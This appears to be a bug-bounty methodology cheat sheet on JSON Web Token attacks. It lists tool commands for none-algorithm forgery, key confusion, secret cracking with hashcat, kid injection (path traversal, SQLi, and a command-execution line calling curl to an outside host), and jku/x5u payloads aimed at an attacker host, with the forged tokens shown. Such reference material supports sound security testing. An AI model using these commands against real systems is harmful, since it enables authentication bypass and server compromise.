JWT Token

JWT misconfiguration and attacks

Bug-Bounty-Methodology/JWT.md at main · tuhin1729/Bug-Bounty-MethodologyGitHub

Usefull Burp Extensions

JSON Web Tokens

PimpMyBurp #11: Master signed token exploits with SignSaboteur – YesWeHack

Entropy

Start Live Capture

Viewing the token

python3 jwt_tool.py <<JWT_TOKEN>>

Tampering with the token

python3 jwt_tool.py <<JWT_TOKEN>> -T

Known HMAC secrets or RSA private keys

Checks JWTs for known HMAC secrets or RSA private keys

GitHub - blacklanternsecurity/badsecrets: A library for detecting known secrets across many web frameworksGitHub

JWT Null Signature

Java JDKs 15 to 18 allowing to bypass signature checks

security-labs-pocs/proof-of-concept-exploits/jwt-null-signature-vulnerable-app at main · DataDog/security-labs-pocsGitHub

jwtxpl <token> -a hs256 -p <key>:<value> -n

Signature not verified

jwtXploiter

jwtxpl <token> -a hs256 -p <key>:<value> --unverified

jwt-pwn - unisigned JWT

python3 jwt-mimicker.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqd3QiOiJwd24ifQ.4pOAm1W4SHUoOgSrc8D-J
1YqLEv9ypAApz27nfYP5L4"


[#] Generated unsigned JWT:
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJqd3QiOiJwd24ifQ.

None algorithm attack – CVE-2015-9235

Since the algorithm is set to "none", any signature that was present can be removed. In other words, you can remove everything following the third period in the JWT.

python3 jwt_tool.py <<JWT_TOKEN>> -X a

Also Try with JWTweak

RS256 to HS256 Key Confusion Attack – CVE-2016-5431

GitHub - RemmyNine/Confusional: Python tool to generate crafted JWTs, exploiting the algorithm confusion vulnerability in JWT signature validation. Useful for security testing.GitHub

python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk <<PUBKEY.PEM>>

Also Try with JWTweak - Change to multiple Algorithme

Test a `JWT` against CVE-2018-1000531 and `HS256` brute-force attacks

python jwtcat.py vulnerable -e "ey<TOKEN>"

Crack Weak Signing Key - HS256, HS384 & HS512

python3 jwt_tool.py <<JWT_TOKEN>> -C -d <<DICT_FILE>>

GitHub - lmammino/jwt-cracker: Simple HS256 JWT token brute force crackerGitHub

HS256

hashcat -m 16500 /tmp/jwt.hash /path/to/wordlist.txt

Small list

Bug-Bounty-Wordlists/jwt-secrets.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

Big list

jwt-secrets/jwt.secrets.list at master · wallarm/jwt-secretsGitHub

Get Key From SSL Certs

Sometimes JWTs are signed using the server ssl connection private key. With the --auto-try option, passing the server domain as argument, the tool will grab the ssl server cert and will extract the public key from it.

jwtxpl <token> -a hs256 -p <key>:<value> --auto-try <domain>

Multiple Payloads

jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.5m9zFPGPU0LMdTTLCR7jXMP8357nNAa0z8ABJJE3r3c --jwk-attack attack.hahwul.com --jwk-protocol https --jwk-trust trust.hahwul.com

INFO[0000] Generate none payload                         header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=none
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate NonE payload                         header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonE
eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate NONE payload                         header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONE
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate jku + basic payload                  header="{\"alg\":\"hs256\",\"jku\":\"attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6ImF0dGFjay5oYWh3dWwuY29tIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate jku host validation payload          header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.comZattack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbVphdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate jku host validation payload          header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.com@attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbUBhdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate jku host header injection (w/CRLF) payload  header="{\"alg\":\"hs256\",\"jku\":\"https://trust.hahwul.com%0d0aHost: attack.hahwul.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbSUwZDBhSG9zdDogYXR0YWNrLmhhaHd1bC5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate x5u + basic payload                  header="{\"alg\":\"hs256\",\"x5u\":\"attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6ImF0dGFjay5oYWh3dWwuY29tIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate x5u host validation payload          header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.comZattack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbVphdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate x5u host validation payload          header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.com@attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbUBhdHRhY2suaGFod3VsLmNvbSIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

INFO[0000] Generate x5u host header injection (w/CRLF) payload  header="{\"alg\":\"hs256\",\"x5u\":\"https://trust.hahwul.com%0d0aHost: attack.hahwul.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vdHJ1c3QuaGFod3VsLmNvbSUwZDBhSG9zdDogYXR0YWNrLmhhaHd1bC5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkhBSFdVTCIsInJlZnJlc2hfdG9rZW4iOiJhYmNkMTIzNDU0NjQiLCJpYXQiOjE1MTYyMzkwMjJ9.

JWK Header Injection

Lab: JWT authentication bypass via jku header injection | Web Security AcademyWebSecAcademy

JWT Authentication Bypass via JWK Header InjectionMedium

JKU header injection

Lab: JWT authentication bypass via jku header injection | Web Security AcademyWebSecAcademy

JWT authentication bypass via jku header injection Dec 26, 2022siunam’s Website

Kid Attacks

jwtxpl <token> -a hs256 -p <key>:<value> --inject-kid sqli
jwtxpl <token> -a hs256 -p <key>:<value> --inject-kid dirtrv
jwtxpl <token> -a hs256 --inject-kid rce
jwtxpl <token> -a hs256 --exec-via-kid "curl mydomain.com:8080"

Kid injection - Path Traversal

jwt_tool.py eyJ0<-SNIP->6tsXW4w -I -hc kid -hv '/dev/null' -pc premium -pv true -S hs512

-I: injection mode

-pc field: Field (in the payload) to modify

-pv new_value: Sets the new value of the field

-S: Signature algorithm

Lab: JWT authentication bypass via kid header path traversal | Web Security AcademyWebSecAcademy

JWT Forgery via Path Traversal | InvictiInvicti

https://www.youtube.com/watch?v=78FIFrOi4Os

Kid Out of Band

JWT kid Parameter Out of Band Command Injection | InvictiInvicti

Forge Signed Tokens

SignSaboteur - Burp Extension

Introducing SignSaboteur: forge signed web tokens with easePortSwigger Research

All tests

JWTLens

JWTLens - JWT Security Analyzerjwtlens.netlify.app

JWTools

jwt_tool.py -t http://example/api/nmap -rh "Header-JWT: eyJ0<-SNIP->zw6tsXW4w" -rh "accept: application/json" -rh "Content-Type: application/json" -pd "[ \"1.1.1.1\", \"4.4.4.4\"]" -M pb -np

-t : target

-rh: Headers

-pd: Payload Data (in this example IP adresses)

-M pb: Playbook scan

-np: no pause

jwt_tool -t http://target-name.com/ -rh "Authorization: Bearer JWT_Token" -M pb

python3 jwt_tool.py -M at \
-t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" \
-rh "Authorization: Bearer eyJhbG...<JWT Token>"

-M at: All Tests

python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/profile" -rh "Authorization: Bearer <JWT Token>"

Tools

Resources

JWT attacks | Web Security AcademyWebSecAcademy

Hacker Tools: JWT_Tool - The JSON Web Token ToolkitIntigriti

JWT Vulnerabilities (Json Web Tokens) | HackTricks

All About JWT VulnerabilitiesMedium

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousBasic HTTP Authentification NextIDOR

Last updated 21 days ago